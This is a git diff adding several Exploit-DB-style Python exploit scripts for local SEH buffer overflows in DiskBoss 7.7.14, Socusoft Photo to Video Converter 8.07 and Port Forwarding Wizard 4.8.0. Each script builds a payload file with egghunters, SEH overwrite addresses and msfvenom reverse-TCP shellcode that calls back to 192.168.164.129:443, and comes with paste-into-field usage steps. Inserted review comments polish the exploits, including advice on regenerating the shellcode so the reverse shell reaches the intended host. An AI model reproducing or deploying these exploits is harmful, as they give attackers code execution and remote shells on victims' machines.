Paste the clipboard into the "Archive To" field and click on Ok button + +#!/usr/bin/python + +egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c" +egg += "\x25\x4A\x50\x5c\x25\x4A" +egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI +buf = "" +buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" +buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" +buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" +buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" +buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" +buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" +buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" +buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" +buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" +buf += 
"\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" +buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" +buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" +buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" +buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" +buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" +buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" +buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" +buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" +buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" +buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" +buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" +buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" +buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" +buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" +buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" +buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" +buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" +buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" +buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" +buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" +buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" +buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" +buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" +buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" +buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" +buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" +buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" +buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" +buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" +buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" +buf += 
"\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" +buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" +buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" +buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" +buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" +buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" +buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" +buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" +buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" +buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" + +exploit = "A"*4112 +# 0x40012623 - pop pop ret rtl60.bpl +exploit += "\x74\x06\x75\x04" +exploit += "\x23\x26\x01\x40" +exploit += egg +exploit += "C"*(5000-4120-len(egg)) +exploit += "T00WT00W" +exploit += buf + +f = open("exploit.txt", "w") +f.write(exploit) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48689.py b/exploits/windows/local/48689.py new file mode 100755 index 000000000..ece7e4d0e --- /dev/null +++ b/exploits/windows/local/48689.py 
@@ -0,0 +1,100 @@ +# Exploit Title: DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) +# Date: 2020-07-26 +# Exploit Author: MasterVlad +# Vendor Homepage: https://www.diskboss.com/ +# Software Link: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe +# Version: 7.7.14 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 32-bit + +# Proof of Concept: + +# 1. Run the python script +# 2. Open exploit.txt and copy the content to clipboard +# 3. Open diskbsg.exe and go to Tools -> DiskBoss Options +# 4. Go to Advanced and paste the clipboard into the "Reports and Data Directory" field +# 5. Click on Save button + + +#!/usr/bin/python + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI +buf = "" +buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" +buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" +buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" +buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" +buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" +buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" +buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" +buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" +buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" +buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" +buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" +buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" +buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" +buf += 
"\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" +buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" +buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" +buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" +buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" +buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" +buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" +buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" +buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" +buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" +buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" +buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" +buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" +buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" +buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" +buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" +buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" +buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" +buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" +buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" +buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" +buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" +buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" +buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" +buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" +buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" +buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" +buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" +buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" +buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" +buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" +buf += 
"\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" +buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" +buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" +buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" +buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" +buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" + + +egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A" +egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" + +exploit = "A"*4096 +# 0x67031912 - pop pop ret +exploit += "\x74\x06\x75\x04" +exploit += "\x12\x19\x03\x67" +exploit += egg +exploit += "C"*(5000-4104) +exploit += "T00WT00W" +exploit += buf + +f = open("exploit.txt", "w") +f.write(exploit) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48691.py b/exploits/windows/local/48691.py new file mode 100755 index 000000000..15e4ac77d --- /dev/null +++ b/exploits/windows/local/48691.py 
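Review bot: The padding `"C"*(5000-4104)` hard-codes the 4096+4+4 bytes already appended and, unlike the otherwise near-identical preceding file in this commit (which writes `"C"*(5000-4120-len(egg))`), does not subtract the egghunter appended just before it, so the two scripts place `T00WT00W` at different total offsets while sharing the same `egg` and `buf` strings verbatim; if that difference is intentional it deserves a comment, otherwise the padding should be derived from `len(exploit)` rather than from a literal the reader has to recompute. A one-line `# buffer length before the tag: ...` comment above the `exploit +=` chain would also let a reviewer check the arithmetic at a glance. Since `buf` and `egg` are byte-for-byte copies of the previous file's and the msfvenom command in the comment is identical, a note saying they were regenerated together would help whoever maintains both.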
@@ -0,0 +1,102 @@ +# Exploit Title: Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) +# Date: 2020-07-23 +# Exploit Author: MasterVlad +# Vendor Homepage: http://www.dvd-photo-slideshow.com/photo-to-video-converter.html +# Software Link: https://www.exploit-db.com/apps/ea1720441edd5990a9d0d1ed564a507e-photo-to-video-pro.exe +# Version: 8.07 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 10 x64 + +# Proof of Concept: + +# 1. Run the python script +# 2. Open exploit.txt and copy the content to clipboard +# 3. Open Socusoft Photo to Video Converter Professional 8.07 and go to Video Output +# 4. Paste the clipboard into the 'Output Folder' field and click on Open + +#!/usr/bin/python + +# Badchars: 22, 2a, 3a, 3c, 3e, 3f, 7c + Non-ascii + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x22\x2a\x3a\x3c\x3e\x3f\x7c" -f py -e x86/alpha_mixed BufferRegister=EDI + +buf = "" +buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x4b\x4c\x49\x78\x6d\x52\x55\x50\x65\x50\x37\x70\x53" +buf += "\x50\x6b\x39\x48\x65\x54\x71\x4b\x70\x45\x34\x6c\x4b" +buf += "\x52\x70\x44\x70\x6e\x6b\x52\x72\x54\x4c\x6c\x4b\x42" +buf += "\x72\x66\x74\x4e\x6b\x72\x52\x65\x78\x46\x6f\x6c\x77" +buf += "\x52\x6a\x74\x66\x45\x61\x6b\x4f\x6e\x4c\x45\x6c\x45" +buf += "\x31\x33\x4c\x55\x52\x34\x6c\x51\x30\x4f\x31\x4a\x6f" +buf += "\x54\x4d\x46\x61\x39\x57\x5a\x42\x48\x72\x32\x72\x52" +buf += "\x77\x6c\x4b\x30\x52\x32\x30\x4c\x4b\x72\x6a\x45\x6c" +buf += "\x6e\x6b\x52\x6c\x42\x31\x42\x58\x79\x73\x57\x38\x76" +buf += "\x61\x4e\x31\x32\x71\x4c\x4b\x63\x69\x31\x30\x33\x31" +buf += "\x58\x53\x6e\x6b\x52\x69\x34\x58\x4b\x53\x64\x7a\x30" +buf += 
"\x49\x4e\x6b\x36\x54\x4e\x6b\x63\x31\x69\x46\x55\x61" +buf += "\x79\x6f\x4e\x4c\x4b\x71\x7a\x6f\x54\x4d\x46\x61\x78" +buf += "\x47\x55\x68\x39\x70\x31\x65\x39\x66\x74\x43\x53\x4d" +buf += "\x59\x68\x47\x4b\x51\x6d\x66\x44\x61\x65\x78\x64\x56" +buf += "\x38\x6e\x6b\x61\x48\x37\x54\x76\x61\x6b\x63\x31\x76" +buf += "\x4c\x4b\x66\x6c\x72\x6b\x4e\x6b\x71\x48\x35\x4c\x33" +buf += "\x31\x68\x53\x6e\x6b\x75\x54\x4c\x4b\x56\x61\x6a\x70" +buf += "\x6c\x49\x32\x64\x74\x64\x44\x64\x73\x6b\x31\x4b\x70" +buf += "\x61\x53\x69\x30\x5a\x63\x61\x6b\x4f\x49\x70\x33\x6f" +buf += "\x31\x4f\x31\x4a\x4c\x4b\x37\x62\x48\x6b\x4e\x6d\x63" +buf += "\x6d\x31\x78\x45\x63\x44\x72\x57\x70\x57\x70\x42\x48" +buf += "\x30\x77\x44\x33\x45\x62\x33\x6f\x33\x64\x30\x68\x50" +buf += "\x4c\x34\x37\x44\x66\x53\x37\x79\x6f\x68\x55\x4e\x58" +buf += "\x6a\x30\x63\x31\x53\x30\x33\x30\x75\x79\x68\x44\x42" +buf += "\x74\x46\x30\x71\x78\x71\x39\x6d\x50\x42\x4b\x77\x70" +buf += "\x79\x6f\x59\x45\x62\x70\x56\x30\x76\x30\x32\x70\x37" +buf += "\x30\x56\x30\x31\x50\x66\x30\x53\x58\x78\x6a\x76\x6f" +buf += "\x49\x4f\x6b\x50\x6b\x4f\x6e\x35\x6c\x57\x33\x5a\x34" +buf += "\x45\x61\x78\x59\x50\x4f\x58\x39\x34\x6e\x61\x70\x68" +buf += "\x75\x52\x67\x70\x63\x31\x6f\x4b\x6d\x59\x6a\x46\x61" +buf += "\x7a\x56\x70\x62\x76\x73\x67\x53\x58\x6d\x49\x69\x35" +buf += "\x64\x34\x43\x51\x69\x6f\x6e\x35\x6b\x35\x4b\x70\x72" +buf += "\x54\x76\x6c\x39\x6f\x62\x6e\x65\x58\x64\x35\x6a\x4c" +buf += "\x55\x38\x5a\x50\x4e\x55\x4c\x62\x30\x56\x4b\x4f\x4a" +buf += "\x75\x63\x58\x70\x63\x50\x6d\x70\x64\x47\x70\x6b\x39" +buf += "\x6b\x53\x43\x67\x51\x47\x62\x77\x45\x61\x6a\x56\x43" +buf += "\x5a\x46\x72\x32\x79\x43\x66\x39\x72\x79\x6d\x61\x76" +buf += "\x4b\x77\x61\x54\x76\x44\x55\x6c\x66\x61\x63\x31\x6e" +buf += "\x6d\x43\x74\x76\x44\x74\x50\x4b\x76\x45\x50\x32\x64" +buf += "\x71\x44\x52\x70\x66\x36\x73\x66\x30\x56\x52\x66\x31" +buf += "\x46\x42\x6e\x62\x76\x51\x46\x43\x63\x73\x66\x71\x78" +buf += 
"\x50\x79\x38\x4c\x67\x4f\x4e\x66\x6b\x4f\x69\x45\x6c" +buf += "\x49\x6b\x50\x42\x6e\x63\x66\x42\x66\x59\x6f\x64\x70" +buf += "\x70\x68\x36\x68\x6d\x57\x75\x4d\x51\x70\x79\x6f\x58" +buf += "\x55\x6d\x6b\x5a\x50\x48\x35\x4e\x42\x76\x36\x52\x48" +buf += "\x4d\x76\x4f\x65\x4d\x6d\x6f\x6d\x79\x6f\x4a\x75\x57" +buf += "\x4c\x77\x76\x71\x6c\x57\x7a\x4d\x50\x69\x6b\x69\x70" +buf += "\x31\x65\x65\x55\x4f\x4b\x72\x67\x67\x63\x31\x62\x72" +buf += "\x4f\x53\x5a\x75\x50\x72\x73\x6b\x4f\x5a\x75\x41\x41" + + + +egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x2C\x09\x50\x5c" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" + +exploit = "A"*304 +exploit += "\x74\x06\x75\x04" +# 0x10047a1e +exploit += "\x1e\x7a\x04\x10" +exploit += egg +exploit += "B"*(2000-312-len(egg)) +exploit += "T00WT00W" +exploit += buf + +f = open("exploit.txt", "w") +f.write(exploit) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48695.py b/exploits/windows/local/48695.py new file mode 100755 index 000000000..226d2afac --- /dev/null +++ b/exploits/windows/local/48695.py 
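Review bot: The filler `exploit += "B"*(2000-312-len(egg))` hard-codes 312 as the size of the 304-byte padding plus nSEH and SEH that precede it, so retuning the offset silently moves the `T00WT00W` tag and shellcode; `exploit += "B" * (2000 - len(exploit))` derives it from the buffer and cannot drift. The alpha-encoded payload has `LHOST=192.168.164.129 LPORT=443` baked in, so a one-line comment above `buf = ""` saying "regenerate with the msfvenom command above before use" would save users from a reverse shell that silently connects to the wrong host. The `#!/usr/bin/python` line follows the header comments instead of being line 1, so it is an ordinary comment and the script is not directly executable; move it to the top or drop it. `f = open(...)`/`f.close()` would read better as `with open("exploit.txt", "w") as f: f.write(exploit)`.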
@@ -0,0 +1,75 @@ +# Exploit Title: Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) +# Exploit Author: Sarang Tumne +# Date: 2020-07-18 +# CVE ID: N/A +# Confirmed on release 4.8.0 and 4.5.0 +# Vendor: http://www.port-forwarding.net/ +# Tested on OS- Windows Vista +# Buffer overflow in upRedSun Port Forwarding Wizard 4.8.0 and earlier version allows local +# attackers to execute arbitrary code via a long request in the Register feature. + +############################################### + +#!/usr/bin/python + +file=open("payload.txt","w+b") + +buffer="\x90"*164 +buffer+="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x73\x61\x72\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # EggHunter +buffer+="\x90"*20 + +shellcode="sarasara" #Egg tag- sarasara +shellcode+="\x90"*40 +shellcode+=("\xdd\xc7\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" +"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" +"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b" +"\x4c\x6d\x38\x6c\x42\x53\x30\x57\x70\x33\x30\x51\x70\x6e\x69" +"\x78\x65\x36\x51\x6f\x30\x35\x34\x4e\x6b\x52\x70\x54\x70\x4e" +"\x6b\x46\x32\x76\x6c\x6c\x4b\x70\x52\x62\x34\x6e\x6b\x33\x42" +"\x54\x68\x66\x6f\x4e\x57\x71\x5a\x34\x66\x70\x31\x49\x6f\x4e" +"\x4c\x57\x4c\x65\x31\x61\x6c\x37\x72\x54\x6c\x55\x70\x59\x51" +"\x48\x4f\x44\x4d\x43\x31\x4a\x67\x49\x72\x5a\x52\x33\x62\x70" +"\x57\x4c\x4b\x50\x52\x56\x70\x6c\x4b\x73\x7a\x35\x6c\x4c\x4b" +"\x50\x4c\x42\x31\x70\x78\x49\x73\x53\x78\x46\x61\x4a\x71\x52" +"\x71\x4e\x6b\x30\x59\x71\x30\x55\x51\x4a\x73\x4e\x6b\x71\x59" +"\x36\x78\x78\x63\x35\x6a\x37\x39\x6c\x4b\x77\x44\x6e\x6b\x76" +"\x61\x39\x46\x76\x51\x59\x6f\x6e\x4c\x4a\x61\x78\x4f\x54\x4d" +"\x77\x71\x5a\x67\x36\x58\x79\x70\x54\x35\x69\x66\x74\x43\x51" +"\x6d\x58\x78\x55\x6b\x43\x4d\x46\x44\x70\x75\x5a\x44\x50\x58" +"\x4e\x6b\x62\x78\x65\x74\x73\x31\x6b\x63\x42\x46\x6c\x4b\x36" 
+"\x6c\x50\x4b\x4e\x6b\x42\x78\x65\x4c\x33\x31\x69\x43\x4c\x4b" +"\x47\x74\x4e\x6b\x77\x71\x78\x50\x4c\x49\x50\x44\x76\x44\x66" +"\x44\x43\x6b\x61\x4b\x31\x71\x51\x49\x63\x6a\x43\x61\x39\x6f" +"\x49\x70\x61\x4f\x73\x6f\x53\x6a\x4e\x6b\x37\x62\x68\x6b\x6c" +"\x4d\x63\x6d\x45\x38\x56\x53\x30\x32\x47\x70\x47\x70\x55\x38" +"\x62\x57\x74\x33\x67\x42\x31\x4f\x61\x44\x33\x58\x50\x4c\x31" +"\x67\x35\x76\x64\x47\x39\x6f\x6b\x65\x6f\x48\x6a\x30\x37\x71" +"\x73\x30\x67\x70\x57\x59\x48\x44\x30\x54\x66\x30\x75\x38\x67" +"\x59\x6d\x50\x32\x4b\x35\x50\x4b\x4f\x6a\x75\x76\x30\x30\x50" +"\x50\x50\x36\x30\x37\x30\x36\x30\x43\x70\x52\x70\x31\x78\x78" +"\x6a\x56\x6f\x49\x4f\x69\x70\x4b\x4f\x39\x45\x5a\x37\x31\x7a" +"\x44\x45\x61\x78\x49\x50\x39\x38\x56\x58\x30\x6c\x73\x58\x55" +"\x52\x73\x30\x56\x71\x43\x6c\x4c\x49\x4b\x56\x30\x6a\x56\x70" +"\x43\x66\x70\x57\x31\x78\x5a\x39\x49\x35\x62\x54\x50\x61\x39" +"\x6f\x7a\x75\x4f\x75\x6f\x30\x73\x44\x46\x6c\x4b\x4f\x70\x4e" +"\x76\x68\x61\x65\x5a\x4c\x53\x58\x68\x70\x4f\x45\x79\x32\x46" +"\x36\x59\x6f\x4a\x75\x63\x58\x32\x43\x52\x4d\x61\x74\x57\x70" +"\x6b\x39\x4a\x43\x63\x67\x76\x37\x63\x67\x64\x71\x69\x66\x62" +"\x4a\x46\x72\x73\x69\x61\x46\x6a\x42\x6b\x4d\x63\x56\x4a\x67" +"\x71\x54\x71\x34\x67\x4c\x47\x71\x46\x61\x6c\x4d\x53\x74\x37" +"\x54\x46\x70\x38\x46\x63\x30\x37\x34\x70\x54\x50\x50\x36\x36" 